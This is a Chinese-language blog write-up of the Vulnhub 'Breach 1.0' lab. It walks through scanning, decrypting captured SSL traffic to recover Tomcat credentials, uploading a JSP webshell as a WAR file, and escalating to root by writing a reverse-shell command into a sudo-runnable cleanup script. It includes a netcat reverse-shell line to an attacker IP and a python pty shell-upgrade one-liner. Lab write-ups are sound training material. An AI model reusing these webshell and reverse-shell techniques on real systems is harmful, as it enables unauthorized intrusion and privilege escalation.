美文网首页渗透测试实用指南
2018-10-09-Vulnhub渗透测试实战writeup(

2018-10-09-Vulnhub渗透测试实战writeup(

作者: 最初的美好_kai | 来源:发表于2018-10-23 11:10 被阅读15次

    老规矩,先上nmap以及dirbuster
    nmap扫描以后发现端口几乎全部开放了,显然是有问题的,应该是直接对端口扫描做了什么防护措施。


    图一
    图二

    这样端口扫描的结果就不存在可信度了。
    目录扫描的结果如下:


    图三
    主要爆破出了该靶机使用的cms以及几个web页面,如initech.html,breach.html等等。
    图四
    图片binwalk以及gedit看了下,没发现啥问题.
    F12看了下源代码,发现一串base64,如下:
    图五

    看了下手头有的信息,breach.html就是让你去看源代码的,其他的就没有什么了。说明这个有可能是那个cms的登录账号密码。试了一下,成功了。


    图六
    进去以后一番搜寻,没发现啥,但是收件箱里面有一些邮件可以看看。
    图七
    图八
    第二封就是过过剧情,主要是第一封信讲了这个证书可能是下一个clue.
    然后再逛逛其他的部分,发现了一个pcap文件说明。
    图九
    感觉这是要我们利用已知的密码和证书解密那个pcap文件到底是在干啥(也就是流量使用了SSL加密,并且可能使用了tomcat当服务器软件)
    先下载下来再说,然后介绍下keytool这个工具,ubuntu上面直接在命令行就可以打开了。keytool是java配置的一个证书管理工具,可以生成证书,加载证书,导出证书,生成密码对等等。
    一波演示:
    图十
    利用前面的提示密码为tomcat直接打开了keystore
    有了秘钥以后就可以直接生成pkcs证书了,命令如下:
    keytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcat
    图十一
    图十二

    接着就是利用该证书解密流量了,又是一波骚操作。。。
    打开wirkshark后选择edit,选择preference,再选择protocol,勾选ssl,填入相应设置,如下:


    图十二
    然后回到wireshark主界面就能直接获取解密流量了。
    然后分析一波流量,翻着可以看到一个unauthorized的http包,一波http流量追踪。
    图十三
    图十四
    可以看到攻击者先是请求一个html界面以后,服务器要求登录的信息流,再往下翻
    图十五
    可以看到攻击者登录成功了,而上面的请求包里面包含了认证信息。
    Authorization: Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC
    解码如下:
    图十六
    账号密码为: tomcat:Tt\5D8F(#!*u=G)4m7zB
    记录一下这里遇到一个奇怪现象,在python中base64模块解码出来的字符串会有两个反斜杠,但是brup以及其他在线网站都是只有一个而已.
    图十七
    估计是python为了标记反斜杠自己加上去的.
    话不多说,进去就是tomcat管理界面了.
    图十八
    这里学习到tomcat管理后台如何上传大小马,这里的管理后台估计有杀毒软件或者其他检测webshell的工具,上传以后每隔几分钟就不见了.又得重新上传一次.
    tomcat管理后台有一个上传war文件的地方,首先把那个你的小马.jsp压缩了,然后把zip后缀去掉改成war后缀就可以上传,上传成功以后首页会显示上传的目录,直接输入该目录访问就可以了.
    图十九
    图二十
    然后直接cat一波/etc/passwd
    图二十一
    然后直接发现三个使用过bash的用户,blumbergh,milton,root
    然后当前目录是/var/lib/tomcat6/webapps/swingline/1
    我们先切换到var/www下面看看有啥玩意
    图二十二
    可以看到有两个目录,其中html主要是对80端口页面的一些文件.
    直接查看一下5446目录下面,可以看到两个名字很长然后奇异的php文件,直接下载下来看看.
    Selection_001.png
    图二十三
    打开以后可以看到数据库的名字以及数据库的密码是空.
    图二十四

    然后说到这个连接的情况,这里踩了一个深坑....几星期才解决这个问题,要明白有时候bash反弹以及netcat反弹都是没有显示的,需要你输入命令才有反弹信息回来,我之前已知以为是反弹失败了,结果用wireshark发现不断有报文传输回来,很好奇才试试命令输入,结果居然连接成功了,卧了个槽.


    图二十五
    我最后使用了一个大马然后netcat反弹回来的nc -e /bin/sh 192.168.110.1 2333
    然后根据前面的线索,直接mysql -u root -p 查看一波数据库
    图二十六
    可以看到milton用户的密码哈希为:6450d89bd3aff1d893b85d3ad65d2ec2
    接下来还能干啥,当然是直接cmd5啊.然而cmd5收费了....
    这里介绍一个somd5网站,不收费...
    图二十七
    解密出来是thelaststraw,最后一根稻草....这是暗示啥....
    来到这一步很自然就是直接su 拉,正常应该是无法直接执行su命令的,所以直接上所谓的python大法拉. python -c 'import pty;pty.spawn("/bin/sh")'
    图二十八
    开心地看到头部了,不再是啥都没有的一党.....
    图二十九
    登入成功
    图三十
    并没有看到啥有用的信息...
    图三十一
    可以看到内核版本为Linux Breach 4.2.0-27-generic,ubuntu 14.04.4
    上一波exploit-db查有无提权本地提权漏洞.But found no result.....
    查看一波bash命令的执行记录,看看啥玩意没有
    图三十二
    可以看到以blumbergh的身份登录过.
    接着就是找找有没有密码了.
    这时候回到我们前面收集到的一个页面来.
    图三十三
    可以从这里收集到几张图片,接着用strings命令把图片中的可打印字符给打印出来,然后找找看有没有啥提示....(其实我觉得这种在平时现实基本不可能遇到)
    图三十四
    注意两个>>可以追加,一个只是覆盖.
    然后可以查看到有趣的东西...一个单词....咖啡啧
    图三十五
    然后就是直接上前面的连接试试能不能登上blumbergh了.
    图三十六
    进去了以后一波ls -la操作
    图三十七
    发现bash执行记录文件,查看一波
    图三十八
    发现作者切换到cleanup目录下查看了tidyup.sh文件,跟随一波
    图三十九
    脚本说明告诉我们每隔3分钟就会把webapps和swingline目录给清洗一下,保护不受黑客侵入.
    就是这玩意让我前面上传木马的时候遭了n遍罪的.......FYM.
    一波命令查看以后发现只有root才能写权限.
    然后我们来看下sudo 有啥权限
    图四十
    发现我们可以sudo不用密码以root权限执行tidyup.sh这个脚本.....
    这样的话可以有一种方法,这里介绍一下tee命令,tee命令用于读取标准输入的数据,并将其内容输出成文件.这样的话就有一条思路,我们先把nc反弹shell的命令通过tee命令从文件中接收输入并将其输出到tidy.sh中,然后就直接等该脚本执行就好....
    如下:
    图四十一
    然后在自己机器上直接开nc监听,等到该脚本执行就可以连接上了
    图四十二
    可以看到返回来的权限就是root了.
    可以看到当前目录下有张图片,把他拷贝到home目录下面来
    然后查看一下crontab计划
    图四十三
    最后一行确实每隔三分钟就执行tidyup.sh
    科普一下crontab命令.
    图四十四
    然后回到前面上传的大马那里把图片下载下来吧.
    图四十五
    下载下来接结束拉,耗时三周才解决的ctf,这次够长的我去.....
    图四十六
    Talk about my flair as much as you can~

    思路总结:
    1.进行端口扫描以及目录扫描发现cms以及一些图片,利用网页源代码信息登录cms.
    2.查看cms中邮件提示信息下载pcap文件,并下载keystore.
    3.熟悉keytool工具并利用keytool生成所谓的解密证书,加载到pacp文件中解密流量.
    4.登录tomcat后利用后台上传点上传大马,并执行命令nc反弹shell回来.
    5.利用各张图片打印出可打印字符,找到高权限用户的登录密码
    6.利用tee命令将反弹shell命令写入自执行脚本中,之后可直接获取root权限

    踩得深坑:上传大马反弹以后不一定有回显,要输入命令试一下!!!!!!

    参考链接:http://www.freebuf.com/articles/system/171318.html
    下载链接:https://download.vulnhub.com/breach/Breach-1.0.zip

    相关文章

      网友评论

        本文标题:2018-10-09-Vulnhub渗透测试实战writeup(

        本文链接:https://www.haomeiwen.com/subject/qftyaftx.html